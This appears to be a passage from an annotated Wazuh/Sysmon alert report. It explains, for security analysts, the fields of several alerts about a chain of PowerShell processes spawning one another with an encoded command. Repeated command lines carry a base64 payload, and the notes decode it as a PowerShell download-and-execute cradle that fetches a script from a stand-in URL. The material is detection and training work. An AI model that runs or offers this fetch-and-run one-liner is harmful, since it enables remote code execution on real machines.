Version string from the binary's resource section. 10.0.26100.x is the Windows 11 24H2 line; a powershell.exe that doesn't match the host's OS build deserves a second look.

data.win.eventdata.description:  Windows PowerShell
Description from the binary's version resource. Attacker-controllable in a renamed or patched file, so corroborate with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the version resource. Same caveat as description: cosmetic, not proof.

data.win.eventdata.company:  Microsoft Corporation
Company name from the version resource. Same caveat: cosmetic, not proof.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE version resource. It survives renaming, so PowerShell.EXE under an image path that isn't powershell.exe means a renamed copy.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process. Same launch as the earlier EID 1 alerts: powershell.exe handed its own path, -NoLogo -NoProfile, and an -EncodedCommand (base64 of the script as UTF-16LE) that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). This is now the third generation of the same chain.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. A user's profile root or Temp is typical for interactive sessions and for dropped tooling alike.

data.win.eventdata.user:  Attacker\\Attcker1
Account (DOMAIN\user) the process runs as.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon ID for the logon session. Same value as the earlier alerts, so every launch in this chain happened in one logon session.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (hex). Matches the Logon ID in Security event 4624 for the session this ran in.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services and other non-interactive logons; 1 and up = an interactive desktop or RDP session.

data.win.eventdata.integrityLevel:  Medium
Process integrity level: Low, Medium (standard user), High (elevated admin) or System. Medium here means no elevation yet.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hashes of the image as configured in Sysmon (SHA256 only here). Same hash as the earlier launches, so it is the same binary each time.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd26-680a-460b-000000000e00}
Sysmon GUID of the parent process. It is the processGuid of PID 2020 from the earlier EID 1 alert, so the tree is 11516 to 2020 to 10656.

data.win.eventdata.parentProcessId:  2020
PID of the parent at spawn time. Recycled like any PID; prefer parentProcessGuid.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that spawned this process. powershell.exe spawning powershell.exe is what trips this rule.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The parent's full command line. Identical to commandLine: the parent ran the same encoded payload, so this is a chain of identical PowerShell launches (PID 2020 spawned PID 10656 here).

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account that owns the parent process. Same user as the child here; a change would mean a logon boundary was crossed.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:34.202+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:34.202+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  57
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534254.1431216
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Event ID within the provider's own channel. For Sysmon, 1 = Process Create and 11 = File Create; the classic Security-log IDs (4624, 4688, etc.) only apply when the channel is Security.

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:31.7121992Z
When Windows wrote the event (UTC, 100-ns precision). It normally sits a few seconds before the alert timestamp; the gap is agent-to-manager collection delay, not attacker activity. Use this, not timestamp, when ordering events from the same host.

data.win.system.eventRecordID:  283853
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service itself (3712 on every event here), not the process in the alert. Use data.win.eventdata.processId for the process you are investigating.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the entry; same caveat as processID above, not the alerted process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:31.699 ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} ProcessId: 10656 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pl3lg5tj.szw.ps1 CreationUtcTime: 2025-04-24 22:37:31.699 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:31.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2a-680a-490b-000000000e00}
Sysmon's GUID for this process, unique even after the PID is reused. Pivot on it to pull every Sysmon event (process create, network, file create) for the same process.

data.win.eventdata.processId:  10656
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the process that created the file, here powershell.exe. Pivot on processGuid to the Event ID 1 record that shows its command line.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pl3lg5tj.szw.ps1
Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell itself at startup to test AppLocker/WDAC script enforcement, so this event is a side effect of the PowerShell launch rather than a tool being dropped; the encoded command in the matching Event ID 1 is the real signal.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:31.699
Creation timestamp on the new file. For a brand-new file it equals UtcTime; an earlier value means an existing file was overwritten or its creation time was altered (Sysmon Event ID 2 covers the latter).

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:36.742+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:36.742+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  54
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534256.1433985
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Event ID within the provider's own channel. For Sysmon, 1 = Process Create and 11 = File Create; the classic Security-log IDs (4624, 4688, etc.) only apply when the channel is Security.

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:34.5897282Z
When Windows wrote the event (UTC, 100-ns precision). It normally sits a few seconds before the alert timestamp; the gap is agent-to-manager collection delay, not attacker activity. Use this, not timestamp, when ordering events from the same host.

data.win.system.eventRecordID:  283901
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service itself (3712 on every event here), not the process in the alert. Use data.win.eventdata.processId for the process you are investigating.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the entry; same caveat as processID above, not the alerted process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:33.020 ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} ProcessId: 13716 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} ParentProcessId: 10656 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:33.020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2d-680a-4c0b-000000000e00}
Sysmon's GUID for this process, unique even after the PID is reused. Pivot on it to pull every Sysmon event (process create, network, file create) for the same process.

data.win.eventdata.processId:  13716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
Filename baked into the PE version resource. If it differs from the Image filename the binary was renamed on disk, a common way to dodge name-based rules. Here it matches, so this is powershell.exe under its real name.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line of the new process. -EncodedCommand takes a base64-encoded UTF-16LE script, so decode it before judging the alert; here it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), i.e. fetch script text from a URL and run it in memory. -NoProfile and -NoLogo are typical of scripted rather than interactive launches.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex). Match it to the Security 4624 event with the same Logon ID to see how and when Attcker1 logged on; logonGuid names the same session as a GUID.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
Integrity level of the process token. Medium = standard user, High = elevated (admin), System = service. Medium here means nothing has elevated yet; watch for a High-level child.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file in the algorithms configured in Sysmon (SHA256 here). For a Microsoft binary, check it against the known-good hash for that FileVersion; a mismatch means the file was replaced. It is identical across the Process Create events here, so the same binary each time.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd2a-680a-490b-000000000e00}
Sysmon GUID of the parent process. Pivot on it to find the parent's own Event ID 1, and keep walking up until you reach the first non-PowerShell launcher, which is what the investigation has to explain.

data.win.eventdata.parentProcessId:  10656
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Command line of the parent. It carries the same -EncodedCommand payload as this process's commandLine (base64 UTF-16LE; decodes to the IEX(New-Object Net.WebClient).DownloadString('https://example.com/test') one-liner), so PowerShell is re-spawning itself with an identical payload; walk up via parentProcessGuid to the first non-PowerShell launcher.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:36.746+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:36.746+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  58
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534256.1442056
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Event ID within the provider's own channel. For Sysmon, 1 = Process Create and 11 = File Create; the classic Security-log IDs (4624, 4688, etc.) only apply when the channel is Security.

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:34.8542189Z
When Windows wrote the event (UTC, 100-ns precision). It normally sits a few seconds before the alert timestamp; the gap is agent-to-manager collection delay, not attacker activity. Use this, not timestamp, when ordering events from the same host.

data.win.system.eventRecordID:  283902
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service itself (3712 on every event here), not the process in the alert. Use data.win.eventdata.processId for the process you are investigating.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the entry; same caveat as processID above, not the alerted process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:34.803 ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} ProcessId: 13716 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awdjgktt.o0r.ps1 CreationUtcTime: 2025-04-24 22:37:34.803 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:34.803
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2d-680a-4c0b-000000000e00}
Sysmon's GUID for this process, unique even after the PID is reused. Pivot on it to pull every Sysmon event (process create, network, file create) for the same process.

data.win.eventdata.processId:  13716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the process that created the file, here powershell.exe. Pivot on processGuid to the Event ID 1 record that shows its command line.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awdjgktt.o0r.ps1
Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell itself at startup to test AppLocker/WDAC script enforcement, so this event is a side effect of the PowerShell launch rather than a tool being dropped; the encoded command in the matching Event ID 1 is the real signal.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:34.803
Creation timestamp on the new file. For a brand-new file it equals UtcTime; an earlier value means an existing file was overwritten or its creation time was altered (Sysmon Event ID 2 covers the latter).

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:40.368+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:40.368+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  55
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534260.1444825
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Event ID within the provider's own channel. For Sysmon, 1 = Process Create and 11 = File Create; the classic Security-log IDs (4624, 4688, etc.) only apply when the channel is Security.

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:37.7599742Z
When Windows wrote the event (UTC, 100-ns precision). It normally sits a few seconds before the alert timestamp; the gap is agent-to-manager collection delay, not attacker activity. Use this, not timestamp, when ordering events from the same host.

data.win.system.eventRecordID:  283927
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service itself (3712 on every event here), not the process in the alert. Use data.win.eventdata.processId for the process you are investigating.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the entry; same caveat as processID above, not the alerted process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

